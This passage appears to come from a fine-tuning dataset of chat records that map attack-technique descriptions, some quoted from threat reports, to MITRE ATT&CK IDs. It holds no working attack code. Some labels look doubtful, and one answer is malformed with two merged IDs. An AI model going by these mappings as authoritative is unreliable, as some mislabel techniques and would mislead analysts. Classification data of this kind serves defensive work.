- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has encrypted its C2 traffic with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Socksbot creates a suspended svchost process and injects its DLL into it."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Multiple samples contain UAC bypass code for both 32 and 64-bit systems. The UAC bypass code is stored as 'DAT' in the file's resource section"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY has used PowerShell to decode base64-encoded assembly."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has retrieved a list of trusted domains by using \"Nltest.exe /domain_trusts\"."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2) The directory “out” is created in the user’s %AppData% folder. 5) The screenshot is then copied over to the newly created “out” directory of the system where the batch script was executed. 6) In one instance, DHS observed an “out.zip” file created"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol can collect the computer name and OS version from the system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Thursday, April 16, 2020 . PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors . News summary . - Azerbaijan government and energy sector likely targeted by an unknown actor. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. Afterward, it copies 7,074,638 bytes from the end of the file and writes the remaining bytes back to the disk. One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. For each FTP usage, the credentials are provided by the C2 server during the request. Start routine The communication between the scripts is done via a file called \"Abibliophobia23\" Commands and results are written into the file using a custom encryption scheme. The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the \"Paths\" variable of the configuration file. Filesystem monitoring routine Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration. Additional tools . During our investigation, we identified a couple of additional tools mainly in Python and compiled for Windows: - Klog.exe: A keylogger using an output file called \"System32.Log. Tre.py\": A script used to create the file with the files/directories tree"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used PowerShell for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used an RSS feed on Livejournal to update a list of encrypted C2 server names."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is highly likely the adversary then used spear-phishing attacks containing links to these malicious documents as a delivery mechanism"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has communicated to hard-coded IP addresses via HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C – common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments"
- },
- {
- "role": "assistant",
- "content": "T1568.003 - DNS Calculation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTTPBrowser has used DNS for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ‘vsnet’ plugin was intended to spread and launch a payload (BlackEnergy2 dropper itself at the moment) in the local network by using PsExec, as well as gaining primary information on the user’s computer and network"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can achieve persistence by modifying Registry key entries."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has used quser.exe to identify existing RDP connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Depending on the Ramsay version, file collection won’t be restricted to the local system drive, but also will search additional drives such as network or removable drives"
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI can take screenshots of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The name EvilBunny is derived from debug information embedded in the malware’s dropper. Furthermore, the specified piece incorporates a Lua 5.1 interpreter, which allows the malware to execute Lua scripts and change its behavior at runtime. The dropper will place the EvilBunny malware under %APPDATA%\\Perf Manager\\ or %WINDIR%\\msapps\\; depending whether the dropper is running with administrative privileges or not. Also, the malware will generate numerous files to help its execution and frequently reply back to the C&C with status messages. Similar to its dropper, the binary seeks to evade sandboxes. Next to that, the main thread also runs sub threads to maintain log files the malware creates during execution and to keep track of the overall system load the malware creates. The worker threads are internally dubbed ‘hearer’, which is believed to stand for ‘listener’. It can be concluded thereafter that the malware authors were no English native speakers. The main action of the malware is carried out in the main thread, which parses commands and executes Lua scripts, provided by the worker threads via command files. Each hearer has a dedicated method to receive instructions which is either separately via HTTP from the server, aggregated through a downloaded data file or as tasks to be configured as scheduled tasks. In general this is a rather uncommon technique, but it has been observed before, especially in connection with some adware variants"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can use TCP for C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor leverages the Windows Installer service by spawning a process as the trusted installer, allowing the malicious code to run with system-level privileges and skip the UAC prompt."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary executes a PowerShell command that recursively encrypts files in the Documents folder using a hardcoded key."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker distributes SEO‑poisoned links through social media posts that contain popular hashtags, causing search engines to surface malicious sites in related searches."
- },
- {
- "role": "assistant",
- "content": "T1608.006 - Stage Capabilities: SEO Poisoning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor hijacks a running process by modifying its memory and using the SetThreadContext API to execute malicious shellcode."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware replaces the system's RSA key pair with a shorter 1024‑bit key, reducing the strength of encrypted communications."
- },
- {
- "role": "assistant",
- "content": "T1600 - Weaken Encryption"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware uses an external DNS resolver service to look up the IP of its command server, allowing the attacker to change the IP without updating the malware."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A sophisticated campaign adds a socket filter rule that flags traffic from a known C2 IP, allowing the malware to coordinate actions based on the signal."
- },
- {
- "role": "assistant",
- "content": "T1205.002 - Traffic Signaling: Socket Filters"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker scans the victim's home directory for a .bash_history file and parses it to collect plaintext passwords typed into commands."
- },
- {
- "role": "assistant",
- "content": "T1552.003 - Unsecured Credentials: Bash History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors leverage base64url encoding to hide malicious payloads in HTTP GET parameters."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Trojan exfiltrates information by posting data to a remote web service and then terminates the connection, never reading any server reply."
- },
- {
- "role": "assistant",
- "content": "T1102.003 - Web Service: One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker stages data by moving files to a local staging location and renaming them to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker uses a file copy operation that omits the \"Zone.Identifier\" ADS, preventing the Mark‑of‑the‑Web from flagging the payload."
- },
- {
- "role": "assistant",
- "content": "T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious VBA code in a macro-enabled workbook registers a new Office add‑in to achieve persistence."
- },
- {
- "role": "assistant",
- "content": "T1137.006 - Office Application Startup: Add-ins"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By inserting a malicious DLL into the Winlogon notification packages registry value, the adversary achieves persistence across reboots."
- },
- {
- "role": "assistant",
- "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious insider injected code into the SAML identity provider, changing the assertion signing key so that forged SAML tokens are accepted by the service provider."
- },
- {
- "role": "assistant",
- "content": "T1556.007 - Modify Authentication Process: Hybrid Identity"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor leverages COM interfaces to invoke methods in a privileged process, allowing malicious code to execute commands via inter-process communication."
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Inter-Process Communication: Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious actor creates a forged Kerberos service ticket for the HTTP service on a web server, bypassing normal authentication checks with a Silver Ticket."
- },
- {
- "role": "assistant",
- "content": "T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A compromised supplier’s build pipeline injects a malicious binary into the final product distributed to customers."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries execute malicious PowerShell scripts by proxying them through legitimate system scripts to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1216 - System Script Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious actor configures the infected host to relay communications through an external proxy chain, using a compromised VPN endpoint as the first hop."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - Proxy: External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Internal spearphishing: a malicious link is embedded in an email that looks like an internal memo about policy updates."
- },
- {
- "role": "assistant",
- "content": "T1534 - Internal Spearphishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion set exploits a misconfigured internal proxy to forward malicious HTTP requests to external servers, masking the true source IP."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary exploits an authentication service misconfiguration that treats all MFA challenges as successful, effectively nullifying the second factor."
- },
- {
- "role": "assistant",
- "content": "T1556.006 - Modify Authentication Process: Multi-Factor Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A phishing campaign leverages Facebook posts that appear to be from a trusted friend, directing users to a malicious website hosting a ransomware dropper."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Phishing: Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A compromised Jenkins server was used to pull cloud secrets from a secret management store for later exploitation."
- },
- {
- "role": "assistant",
- "content": "T1555.006 - Credentials from Password Stores: Cloud Secrets Management Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware creates a new subkey under HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run to ensure it starts automatically on system boot."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The compromising procedure includes scanning for shared printer and folder resources using the enum4linux tool."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT group disables Windows Event Logging to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1562.002 - Impair Defenses: Disable Windows Event Logging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intruder injects a malicious registry key via Group Policy Preferences to achieve persistent code execution across the domain."
- },
- {
- "role": "assistant",
- "content": "T1484 - Domain Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker exploits ARP cache poisoning to intercept and modify SSL/TLS handshake messages."
- },
- {
- "role": "assistant",
- "content": "T1557.002 - Adversary-in-the-Middle: ARP Cache Poisoning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware encrypts data and then slices the ciphertext into 2 KB blocks before exfiltration to stay under detection thresholds."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor disables modern cryptographic algorithms on a Linux server, forcing use of deprecated ciphers."
- },
- {
- "role": "assistant",
- "content": "T1562.010 - Impair Defenses: Downgrade Attack"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary uses UDP hole punching with a STUN server to establish a direct peer-to-peer channel through a NAT device, allowing data exfiltration without direct inbound connections."
- },
- {
- "role": "assistant",
- "content": "T1599.001 - Network Boundary Bridging: Network Address Translation Traversal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker adds a shortcut to the All Users Startup directory that points to a remote payload, persisting across all accounts."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious actor exploits default credentials on a newly deployed server to establish a foothold."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries retrieve saved login information from Opera's encrypted password store via a local exploit."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious script crawls public code repositories to harvest SSH private keys leaked in commit histories."
- },
- {
- "role": "assistant",
- "content": "T1593.003 - Search Open Websites/Domains: Code Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion framework gathers process information via WMI queries to discover potential targets."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries aggregate harvested data into a tar archive placed in a local staging directory before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor uses the Windows API to retrieve a snapshot of current processes for reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers infiltrate a business associate's network and exploit the existing cross‑domain trust to move laterally into the primary target's domain."
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker modifies the Windows code signing policy to allow execution of unsigned binaries, bypassing driver signature enforcement."
- },
- {
- "role": "assistant",
- "content": "T1553.006 - Subvert Trust Controls: Code Signing Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using a stolen SSH key, the malicious actor edited the nginx configuration on an internal server, resulting in a defaced error page."
- },
- {
- "role": "assistant",
- "content": "T1491.001 - Defacement: Internal Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers gained administrative access to a public web server and replaced the homepage with a political message, clearly defacing the site from an external source."
- },
- {
- "role": "assistant",
- "content": "T1491.002 - Defacement: External Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors exploit a bug to cause a buffer overflow that crashes the target application repeatedly."
- },
- {
- "role": "assistant",
- "content": "T1499 - Endpoint Denial of Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the intrusion, the malware spawns a COM object in a privileged process and uses it to manipulate lower‑privilege applications."
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Inter-Process Communication: Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware queries the Google Cloud Platform metadata endpoint to list compute instances."
- },
- {
- "role": "assistant",
- "content": "T1526 - Cloud Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor exploits the Odbcconf utility to bypass application whitelisting by executing a signed system binary."
- },
- {
- "role": "assistant",
- "content": "T1218.008 - System Binary Proxy Execution: Odbcconf"
- }
- ]
- },
- {
- "messages": [
- {
